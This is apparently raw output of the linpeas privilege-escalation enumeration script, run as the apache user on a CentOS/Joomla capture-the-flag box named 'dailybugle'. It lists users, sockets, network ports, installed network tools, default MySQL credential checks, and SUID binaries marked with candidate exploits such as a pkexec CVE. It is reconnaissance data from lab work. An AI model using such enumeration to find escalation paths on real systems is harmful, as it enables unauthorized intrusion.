/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /dev/log
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /dev/log

╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/anvil
/bounce
/cleanup
/defer
/dev/log
  └─(Read Write)
/discard
/error
/flush
/lmtp
/local
/pickup
/proxymap
/proxywrite
/qmgr
/relay
/retry
/rewrite
/run/dbus/system_bus_socket
  └─(Read Write)
/run/lvm/lvmetad.socket
/run/lvm/lvmpolld.socket
/run/systemd/cgroups-agent
/run/systemd/journal/socket
  └─(Read Write)
/run/systemd/journal/stdout
  └─(Read Write)
/run/systemd/notify
  └─(Read Write)
/run/systemd/private
  └─(Read Write)
/run/systemd/shutdownd
/run/udev/control
/scache
/showq
/smtp
/tlsmgr
/trace
/var/lib/mysql/mysql.sock
  └─(Read Write)
/verify
/virtual

╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.PolicyKit1.conf (  <policy user="polkitd">
  <policy user="polkitd">)

╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME                                   PID PROCESS         USER             CONNECTION    UNIT                      SESSION    DESCRIPTION
:1.0                                     1 systemd         root             :1.0          -                         -          -
:1.1                                   637 systemd-logind  root             :1.1          systemd-logind.service    -          -
:1.2                                   635 polkitd         polkitd          :1.2          polkit.service            -          -
:1.29                                  938 tuned           root             :1.29         tuned.service             -          -
:1.3                                   638 NetworkManager  root             :1.3          NetworkManager.service    -          -
:1.51                                12783 busctl          apache           :1.51         httpd.service             -          -
:1.7                                   638 NetworkManager  root             :1.7          NetworkManager.service    -          -
com.redhat.ifcfgrh1                    638 NetworkManager  root             :1.7          NetworkManager.service    -          -
com.redhat.tuned                       938 tuned           root             :1.29         tuned.service             -          -
fi.epitest.hostap.WPASupplicant          - -               -                (activatable) -                         -
fi.w1.wpa_supplicant1                    - -               -                (activatable) -                         -
org.freedesktop.DBus                   632 dbus-daemon     dbus             org.freedesktop.DBus dbus.service              -          -
org.freedesktop.NetworkManager         638 NetworkManager  root             :1.3          NetworkManager.service    -          -
org.freedesktop.PolicyKit1             635 polkitd         polkitd          :1.2          polkit.service            -          -
org.freedesktop.hostname1                - -               -                (activatable) -                         -
org.freedesktop.import1                  - -               -                (activatable) -                         -
org.freedesktop.locale1                  - -               -                (activatable) -                         -
org.freedesktop.login1                 637 systemd-logind  root             :1.1          systemd-logind.service    -          -
org.freedesktop.machine1                 - -               -                (activatable) -                         -
org.freedesktop.nm_dispatcher            - -               -                (activatable) -                         -
org.freedesktop.systemd1                 1 systemd         root             :1.0          -                         -          -
org.freedesktop.timedate1                - -               -                (activatable) -                         -


                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
                              ╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
dailybugle
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4
::1         localhost localhost.localdomain localhost6 localhost6.localdomain6
; generated by /usr/sbin/dhclient-script
search eu-west-1.compute.internal
nameserver 10.0.0.2

╔══════════╣ Interfaces
default 0.0.0.0
loopback 127.0.0.0
link-local 169.254.0.0
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 02:4a:61:51:80:5b brd ff:ff:ff:ff:ff:ff
    inet 10.10.239.38/16 brd 10.10.255.255 scope global dynamic eth0
       valid_lft 3567sec preferred_lft 3567sec
    inet6 fe80::4a:61ff:fe51:805b/64 scope link 
       valid_lft forever preferred_lft forever

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp    LISTEN     0      100    127.0.0.1:25                    *:*                  
tcp    LISTEN     0      50        *:3306                  *:*                  
tcp    LISTEN     0      128       *:22                    *:*                  
tcp    LISTEN     0      100       [::1]:25                 [::]:*                  
tcp    LISTEN     0      128    [::]:80                 [::]:*                  
tcp    LISTEN     0      128    [::]:22                 [::]:*                  

╔══════════╣ Can I sniff with tcpdump?
No



                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
                               ╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=48(apache) gid=48(apache) groups=48(apache)

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid

╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is disabled (0), so sudo tokens could be abused

╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Users with console
jjameson:x:1000:1000:Jonah Jameson:/home/jjameson:/bin/bash
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(bin) gid=1(bin) groups=1(bin)
uid=1000(jjameson) gid=1000(jjameson) groups=1000(jjameson)
uid=11(operator) gid=0(root) groups=0(root)
uid=12(games) gid=100(users) groups=100(users)
uid=14(ftp) gid=50(ftp) groups=50(ftp)
uid=192(systemd-network) gid=192(systemd-network) groups=192(systemd-network)
uid=2(daemon[0m) gid=2(daemon[0m) groups=2(daemon[0m)
uid=27(mysql) gid=27(mysql) groups=27(mysql)
uid=3(adm) gid=4(adm) groups=4(adm)
uid=4(lp) gid=7(lp) groups=7(lp)
uid=48(apache) gid=48(apache) groups=48(apache)
uid=5(sync) gid=0(root) groups=0(root)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=7(halt) gid=0(root) groups=0(root)
uid=74(sshd) gid=74(sshd) groups=74(sshd)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=89(postfix) gid=89(postfix) groups=89(postfix),12(mail)
uid=99(nobody) gid=99(nobody) groups=99(nobody)
uid=998(chrony) gid=996(chrony) groups=996(chrony)
uid=999(polkitd) gid=998(polkitd) groups=998(polkitd)

╔══════════╣ Login now
 00:52:59 up  2:44,  0 users,  load average: 0.53, 0.14, 0.09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

╔══════════╣ Last logons
jjameson pts/0        Mon Dec 16 04:40:23 2019 - Mon Dec 16 04:44:02 2019  (00:03)     192.168.1.137
reboot   system boot  Mon Dec 16 04:38:13 2019 - Sun Oct  1 00:52:59 2023 (1384+19:14) 0.0.0.0
jjameson pts/0        Sun Dec 15 18:54:57 2019 - crash                     (09:43)     192.168.1.137
reboot   system boot  Sun Dec 15 18:53:18 2019 - Sun Oct  1 00:52:59 2023 (1385+04:59) 0.0.0.0
jjameson pts/0        Sat Dec 14 15:41:42 2019 - crash                    (1+03:11)    192.168.1.137
reboot   system boot  Sat Dec 14 15:40:55 2019 - Sun Oct  1 00:52:59 2023 (1386+08:12) 0.0.0.0
jjameson pts/0        Sat Dec 14 15:02:37 2019 - Sat Dec 14 15:41:08 2019  (00:38)     192.168.1.137
reboot   system boot  Sat Dec 14 14:09:36 2019 - Sun Oct  1 00:52:59 2023 (1386+09:43) 0.0.0.0

wtmp begins Sat Dec 14 14:09:36 2019

╔══════════╣ Last time logon each user
Username         Port     From             Latest
root             pts/0    netwars          Mon Dec 16 05:11:46 -0500 2019
jjameson         pts/0    netwars          Mon Dec 16 05:14:55 -0500 2019

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)

╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!



                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
                             ╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/make
/usr/bin/nc
/usr/bin/ncat
/usr/bin/nmap
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers

╔══════════╣ MySQL version
mysql  Ver 15.1 Distrib 5.5.64-MariaDB, for Linux (x86_64) using readline 5.1


═╣ MySQL connection using default root/root ........... No
═╣ MySQL connection using root/toor ................... No
═╣ MySQL connection using root/NOPASS ................. No

╔══════════╣ Searching mysql credentials and exec

╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: apache2 Not Found
Server version: Apache/2.4.6 (CentOS)
Server built:   Aug  8 2019 11:41:18
Nginx version: nginx Not Found

══╣ PHP exec extensions


-rw-r--r--. 1 root root 67145 Oct 22  2019 /etc/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysql.allow_local_infile = On
mysql.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
sybct.allow_persistent = On
mssql.allow_persistent = On


drwxr-xr-x. 2 apache apache 42 Apr 25  2017 /var/www/html/media/editors/codemirror/mode/nginx


╔══════════╣ Analyzing Http conf Files (limit 70)
-rw-r--r--. 1 root root 11753 Aug  6  2019 /etc/httpd/conf/httpd.conf
-rw-r--r--. 1 root root 77 Aug  6  2019 /usr/lib/tmpfiles.d/httpd.conf

╔══════════╣ Analyzing Wifi Connections Files (limit 70)
drwxr-xr-x. 2 root root 6 Aug  8  2019 /etc/NetworkManager/system-connections
drwxr-xr-x. 2 root root 6 Aug  8  2019 /etc/NetworkManager/system-connections


╔══════════╣ Analyzing VNC Files (limit 70)




-rw-r--r--. 1 root root 475 Aug  8  2019 /usr/lib/firewalld/services/vnc-server.xml
<?xml version="1.0" encoding="utf-8"?>
<service>
  <short>Virtual Network Computing Server (VNC)</short>
  <description>A VNC server provides an external accessible X session. Enable this option if you plan to provide a VNC server with direct access. The access will be possible for displays :0 to :3. If you plan to provide access with SSH, do not open this option and use the via option of the VNC viewer.</description>
  <port protocol="tcp" port="5900-5903"/>
</service>

╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x. 3 apache apache 32 Apr 25  2017 /var/www/html/libraries/vendor/joomla/ldap

drwxr-xr-x. 2 apache apache 38 Apr 25  2017 /var/www/html/plugins/authentication/ldap


╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)





-rw-r--r--. 1 root root 162 Dec 14  2019 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r--. 1 root root 82 Dec 14  2019 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r--. 1 root root 382 Dec 14  2019 /etc/ssh/ssh_host_rsa_key.pub
-rw-r--r--. 1 root root 1665 May 12  2006 /usr/share/doc/pygpgme-0.3/tests/keys/key1.pub
-rw-r--r--. 1 root root 3181 May 12  2006 /usr/share/doc/pygpgme-0.3/tests/keys/key2.pub
-rw-r--r--. 1 root root 908 May 12  2006 /usr/share/doc/pygpgme-0.3/tests/keys/passphrase.pub
-rw-r--r--. 1 root root 1454 May 12  2006 /usr/share/doc/pygpgme-0.3/tests/keys/revoked.pub
-rw-r--r--. 1 root root 4046 May 12  2006 /usr/share/doc/pygpgme-0.3/tests/keys/signonly.pub

══╣ Some certificates were found (out limited):
/etc/pki/ca-trust/extracted/pem/objsign-ca-bundle.pem
/etc/pki/ca-trust/source/ca-bundle.legacy.crt
5563PSTORAGE_CERTSBIN

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow


Searching inside /etc/ssh/ssh_config for interesting info
Host *
	GSSAPIAuthentication yes
	ForwardX11Trusted yes
	SendEnv LANG LC_CTYPE LC_NUMERIC LC_TIME LC_COLLATE LC_MONETARY LC_MESSAGES
	SendEnv LC_PAPER LC_NAME LC_ADDRESS LC_TELEPHONE LC_MEASUREMENT
	SendEnv LC_IDENTIFICATION LC_ALL LANGUAGE
	SendEnv XMODIFIERS

╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x. 2 root root 4096 Dec 14  2019 /etc/pam.d
-rw-r--r--. 1 root root 904 Aug  8  2019 /etc/pam.d/sshd
auth	   required	pam_sepermit.so
auth       substack     password-auth
auth       include      postlogin
-auth      optional     pam_reauthorize.so prepare
account    required     pam_nologin.so
account    include      password-auth
password   include      password-auth
session    required     pam_selinux.so close
session    required     pam_loginuid.so
session    required     pam_selinux.so open env_params
session    required     pam_namespace.so
session    optional     pam_keyinit.so force revoke
session    include      password-auth
session    include      postlogin
-session   optional     pam_reauthorize.so prepare


╔══════════╣ Analyzing NFS Exports Files (limit 70)
-rw-r--r--. 1 root root 0 Jun  7  2013 /etc/exports

╔══════════╣ Searching kerberos conf files and tickets
╚ http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory
ptrace protection is disabled (0), you might find tickets inside processes memory
-rw-r--r--. 1 root root 641 Jan 29  2019 /etc/krb5.conf
# Configuration snippets may be placed in this directory as well
includedir /etc/krb5.conf.d/

[logging]
 default = FILE:/var/log/krb5libs.log
 kdc = FILE:/var/log/krb5kdc.log
 admin_server = FILE:/var/log/kadmind.log

[libdefaults]
 dns_lookup_realm = false
 ticket_lifetime = 24h
 renew_lifetime = 7d
 forwardable = true
 rdns = false
 pkinit_anchors = /etc/pki/tls/certs/ca-bundle.crt
# default_realm = EXAMPLE.COM
 default_ccache_name = KEYRING:persistent:%{uid}

[realms]
# EXAMPLE.COM = {
#  kdc = kerberos.example.com
#  admin_server = kerberos.example.com
# }

[domain_realm]
# .example.com = EXAMPLE.COM
# example.com = EXAMPLE.COM
-rw-r--r--. 1 root root 369 Jan 29  2019 /usr/share/doc/krb5-libs-1.15.1/examples/krb5.conf
[libdefaults]
	default_realm = ATHENA.MIT.EDU

[realms]
# use "kdc = ..." if realm admins haven't put SRV records into DNS
	ATHENA.MIT.EDU = {
		admin_server = kerberos.mit.edu
	}
	ANDREW.CMU.EDU = {
		admin_server = kdc-01.andrew.cmu.edu
	}

[domain_realm]
	mit.edu = ATHENA.MIT.EDU
	csail.mit.edu = CSAIL.MIT.EDU
	.ucsc.edu = CATS.UCSC.EDU

[logging]
#	kdc = CONSOLE
tickets kerberos Not Found
klist Not Found



╔══════════╣ Analyzing Backup Manager Files (limit 70)
-rwxr-xr-x. 1 apache apache 8378 Apr 25  2017 /var/www/html/libraries/joomla/cache/storage.php
-rwxr-xr-x. 1 apache apache 4948 Apr 25  2017 /var/www/html/libraries/joomla/session/storage.php

-rwxr-xr-x. 1 apache apache 1060 Apr 25  2017 /var/www/html/administrator/components/com_installer/controllers/database.php
		$model = $this->getModel('database');
-rwxr-xr-x. 1 apache apache 7802 Apr 25  2017 /var/www/html/administrator/components/com_installer/models/database.php
-rwxr-xr-x. 1 apache apache 5876 Apr 25  2017 /var/www/html/libraries/fof/database/database.php
	 * used for the connection -- the default is 'mysqli'.  The 'database' option determines which database is to
-rwxr-xr-x. 1 apache apache 5328 Apr 25  2017 /var/www/html/libraries/joomla/database/database.php
	 * used for the connection -- the default is 'mysqli'.  The 'database' option determines which database is to
-rwxr-xr-x. 1 apache apache 3934 Apr 25  2017 /var/www/html/libraries/joomla/log/logger/database.php
			'host' => $this->host,
			'user' => $this->user,
			'password' => $this->password,
			'database' => $this->database,
-rwxr-xr-x. 1 apache apache 1455 Apr 25  2017 /var/www/html/libraries/joomla/model/database.php
-rwxr-xr-x. 1 apache apache 3978 Apr 25  2017 /var/www/html/libraries/joomla/session/storage/database.php

╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd

╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
gpg Not Found
netpgpkeys Not Found
netpgp Not Found

-rw-r--r--. 1 root root 9551 Aug  8  2019 /usr/lib/systemd/import-pubring.gpg



╔══════════╣ Analyzing Postfix Files (limit 70)
drwxr-xr-x. 2 root root 154 Dec 14  2019 /etc/postfix
-rw-r--r--. 1 root root 6105 Oct 30  2018 /etc/postfix/master.cf
#  flags=DRhu user=vmail argv=/usr/local/bin/maildrop -d ${recipient}
#  user=cyrus argv=/usr/lib/cyrus-imapd/deliver -e -r ${sender} -m ${extension} ${user}
#  flags=R user=cyrus argv=/usr/lib/cyrus-imapd/deliver -e -m ${extension} ${user}
#  flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient)
#  flags=F user=ftn argv=/usr/lib/ifmail/ifmail -r $nexthop ($recipient)
#  flags=Fq. user=bsmtp argv=/usr/local/sbin/bsmtp -f $sender $nexthop $recipient
#  flags=R user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store
#  flags=FR user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py

drwxr-xr-x. 2 root root 4096 Dec 14  2019 /usr/libexec/postfix
-rw-r--r--. 1 root root 6105 Oct 30  2018 /usr/libexec/postfix/master.cf
#  flags=DRhu user=vmail argv=/usr/local/bin/maildrop -d ${recipient}
#  user=cyrus argv=/usr/lib/cyrus-imapd/deliver -e -r ${sender} -m ${extension} ${user}
#  flags=R user=cyrus argv=/usr/lib/cyrus-imapd/deliver -e -m ${extension} ${user}
#  flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient)
#  flags=F user=ftn argv=/usr/lib/ifmail/ifmail -r $nexthop ($recipient)
#  flags=Fq. user=bsmtp argv=/usr/local/sbin/bsmtp -f $sender $nexthop $recipient
#  flags=R user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store
#  flags=FR user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py

-rwxr-xr-x. 1 root root 122112 Oct 30  2018 /usr/sbin/postfix

drwx------. 2 postfix root 25 Dec 14  2019 /var/lib/postfix

drwxr-xr-x. 16 root root 201 Dec 14  2019 /var/spool/postfix


╔══════════╣ Analyzing Jenkins Files (limit 70)



-rwxr-xr-x. 1 apache apache 358 Apr 25  2017 /var/www/html/administrator/components/com_associations/config.xml
-rwxr-xr-x. 1 apache apache 2470 Apr 25  2017 /var/www/html/administrator/components/com_banners/config.xml
-rwxr-xr-x. 1 apache apache 582 Apr 25  2017 /var/www/html/administrator/components/com_cache/config.xml
-rwxr-xr-x. 1 apache apache 584 Apr 25  2017 /var/www/html/administrator/components/com_checkin/config.xml
-rwxr-xr-x. 1 apache apache 1010 Apr 25  2017 /var/www/html/administrator/components/com_config/config.xml
-rwxr-xr-x. 1 apache apache 25434 Apr 25  2017 /var/www/html/administrator/components/com_contact/config.xml
-rwxr-xr-x. 1 apache apache 27017 Apr 25  2017 /var/www/html/administrator/components/com_content/config.xml
-rwxr-xr-x. 1 apache apache 8630 Apr 25  2017 /var/www/html/administrator/components/com_finder/config.xml
-rwxr-xr-x. 1 apache apache 1613 Apr 25  2017 /var/www/html/administrator/components/com_installer/config.xml
-rwxr-xr-x. 1 apache apache 1480 Apr 25  2017 /var/www/html/administrator/components/com_joomlaupdate/config.xml
-rwxr-xr-x. 1 apache apache 458 Apr 25  2017 /var/www/html/administrator/components/com_languages/config.xml
-rwxr-xr-x. 1 apache apache 2940 Apr 25  2017 /var/www/html/administrator/components/com_media/config.xml
-rwxr-xr-x. 1 apache apache 1319 Apr 25  2017 /var/www/html/administrator/components/com_menus/config.xml
-rwxr-xr-x. 1 apache apache 355 Apr 25  2017 /var/www/html/administrator/components/com_messages/config.xml
-rwxr-xr-x. 1 apache apache 812 Apr 25  2017 /var/www/html/administrator/components/com_messages/models/forms/config.xml
-rwxr-xr-x. 1 apache apache 767 Apr 25  2017 /var/www/html/administrator/components/com_modules/config.xml
-rwxr-xr-x. 1 apache apache 10800 Apr 25  2017 /var/www/html/administrator/components/com_newsfeeds/config.xml
-rwxr-xr-x. 1 apache apache 351 Apr 25  2017 /var/www/html/administrator/components/com_plugins/config.xml
-rwxr-xr-x. 1 apache apache 338 Apr 25  2017 /var/www/html/administrator/components/com_postinstall/config.xml
-rwxr-xr-x. 1 apache apache 687 Apr 25  2017 /var/www/html/administrator/components/com_redirect/config.xml
-rwxr-xr-x. 1 apache apache 2060 Apr 25  2017 /var/www/html/administrator/components/com_search/config.xml
-rwxr-xr-x. 1 apache apache 10586 Apr 25  2017 /var/www/html/administrator/components/com_tags/config.xml
-rwxr-xr-x. 1 apache apache 1912 Apr 25  2017 /var/www/html/administrator/components/com_templates/config.xml
-rwxr-xr-x. 1 apache apache 7199 Apr 25  2017 /var/www/html/administrator/components/com_users/config.xml
			name="sendpassword"
		name="password_options"
-rwxr-xr-x. 1 apache apache 2783 Apr 25  2017 /var/www/html/components/com_config/model/form/config.xml


╔══════════╣ Analyzing Windows Files (limit 70)






















-rw-r--r--. 1 root root 570 Aug  6  2019 /etc/my.cnf









-rw-r--r--. 1 root root 475 Aug  8  2019 /usr/lib/firewalld/services/vnc-server.xml
















-rwxr-xr-x. 1 apache apache 183 Apr 25  2017 /var/www/html/libraries/vendor/web.config




╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r--. 1 root root 231 Aug  8  2019 /etc/skel/.bashrc











                      ╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
                      ╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-x. 1 root root 73K Aug  8  2019 /usr/bin/chage
-rwsr-xr-x. 1 root root 77K Aug  8  2019 /usr/bin/gpasswd
-rws--x--x. 1 root root 24K Aug  8  2019 /usr/bin/chfn  --->  SuSE_9.3/10
-rws--x--x. 1 root root 24K Aug  8  2019 /usr/bin/chsh
-rwsr-xr-x. 1 root root 41K Aug  8  2019 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x. 1 root root 32K Aug  8  2019 /usr/bin/su
---s--x--x. 1 root root 144K Aug  8  2019 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x. 1 root root 44K Aug  8  2019 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x. 1 root root 32K Aug  8  2019 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x. 1 root root 57K Aug  8  2019 /usr/bin/crontab
-rwsr-xr-x. 1 root root 24K Aug  8  2019 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x. 1 root root 28K Aug  8  2019 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x. 1 root root 36K Apr 10  2018 /usr/sbin/unix_chkpwd
-rwsr-xr-x. 1 root root 11K Apr 10  2018 /usr/sbin/pam_timestamp_check
-rwsr-xr-x. 1 root root 12K Aug  8  2019 /usr/sbin/usernetctl
-rwsr-xr-x. 1 root root 16K Aug  8  2019 /usr/lib/polkit-1/polkit-agent-helper-1
-rwsr-x---. 1 root dbus 57K Mar 14  2019 /usr/libexec/dbus-1/dbus-daemon-launch-helper

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-r-xr-sr-x. 1 root tty 15K Jun  9  2014 /usr/bin/wall
-rwxr-sr-x. 1 root tty 20K Aug  8  2019 /usr/bin/write
---x--s--x. 1 root nobody 374K Aug  8  2019 /usr/bin/ssh-agent
-rwxr-sr-x. 1 root root 11K Aug  8  2019 /usr/sbin/netreport
-rwxr-sr-x. 1 root postdrop 214K Oct 30  2018 /usr/sbin/postdrop
-rwxr-sr-x. 1 root postdrop 255K Oct 30  2018 /usr/sbin/postqueue
-rwx--s--x. 1 root utmp 11K Jun  9  2014 /usr/libexec/utempter/utempter
---x--s--x. 1 root ssh_keys 455K Aug  8  2019 /usr/libexec/openssh/ssh-keysign

╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so
/etc/ld.so.conf
Content of /etc/ld.so.conf:
include ld.so.conf.d/*.conf
ld.so.conf.d
  ld.so.conf.d/*

/etc/ld.so.preload
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
══╣ Current shell capabilities
CapInh:  0x0000000000000000=
CapPrm:  0x0000000000000000=
CapEff:	 0x0000000000000000=
CapBnd:  0x0000001fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,35,36
CapAmb:  0x0000000000000000=

══╣ Parent process capabilities
CapInh:	 0x0000000000000000=
CapPrm:	 0x0000000000000000=
CapEff:	 0x0000000000000000=
CapBnd:	 0x0000001fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,35,36
CapAmb:	 0x0000000000000000=


Files with capabilities (limited to 50):
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+ep

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found

╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 68
drwxr-xr-x.  2 root root  251 Dec 14  2019 .
drwxr-xr-x. 79 root root 8192 Jan 14  2020 ..
-rw-r--r--.  1 root root  771 Aug  8  2019 256term.csh
-rw-r--r--.  1 root root  841 Aug  8  2019 256term.sh
-rw-r--r--.  1 root root  196 Mar 24  2017 colorgrep.csh
-rw-r--r--.  1 root root  201 Mar 24  2017 colorgrep.sh
-rw-r--r--.  1 root root 1741 Aug  6  2019 colorls.csh
-rw-r--r--.  1 root root 1606 Aug  6  2019 colorls.sh
-rw-r--r--.  1 root root   80 Oct 30  2018 csh.local
-rw-r--r--.  1 root root 1706 Aug  8  2019 lang.csh
-rw-r--r--.  1 root root 2703 Aug  8  2019 lang.sh
-rw-r--r--.  1 root root  123 Jul 30  2015 less.csh
-rw-r--r--.  1 root root  121 Jul 30  2015 less.sh
-rw-r--r--.  1 root root   81 Oct 30  2018 sh.local
-rw-r--r--.  1 root root  164 Jan 27  2014 which2.csh
-rw-r--r--.  1 root root  169 Jan 27  2014 which2.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/
/var/www
/var/www/cgi-bin

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)

╔══════════╣ Readable files belonging to root and readable by me but not world readable

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/tmp
/tmp/linpeas.sh
/var/cache/httpd
/var/cache/httpd/proxy
/var/lib/dav
/var/lib/php/session/sess_nvuatc4tban8ks2r2o7homh861
/var/tmp
/var/tmp/yum-apache-Oxz_mT
